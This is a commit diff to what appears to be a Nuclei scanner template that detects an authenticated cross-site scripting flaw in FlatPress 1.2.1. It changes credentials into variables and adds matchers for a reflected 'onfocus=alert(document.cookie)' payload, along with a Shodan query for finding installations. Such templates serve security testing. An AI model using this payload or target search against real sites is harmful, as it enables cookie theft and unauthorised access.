Update flatpress-xss.yaml

vulnerabilities/other/flatpress-xss.yaml

@@ -1,7 +1,7 @@
 id: flatpress-xss
 
 info:
-  name: FlatPress 1.2.1 - Cross-site scripting (XSS)
+  name: FlatPress 1.2.1 - Cross-site scripting
   author: arafatansari
   severity: medium
   description: |
@@ -9,9 +9,9 @@ info:
   reference:
     - https://github.com/flatpressblog/flatpress/issues/153
   metadata:
+    verified: true
     shodan-query: http.html:"Flatpress"
-    verified: "true"
-  tags: xss,cve,2021
+  tags: flatpress,xss,authenticated
 
 requests:
   - raw:
@@ -23,11 +23,11 @@ requests:
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="user"
 
-        admin
+        {{username}}
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="pass"
 
-        password
+        {{password}}
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="submit"
 
@@ -39,15 +39,19 @@ requests:
         Host: {{Hostname}}
 
     cookie-reuse: true
-    redirects: true
-    max-redirects: 2
     matchers-condition: and
     matchers:
+      - type: word
+        words:
+          - 'value=""onfocus="alert(document.cookie)"autofocus=""'
+          - 'FlatPress'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-
-      - type: word
-        words:
-          - "alert(document.cookie)"
-        condition: and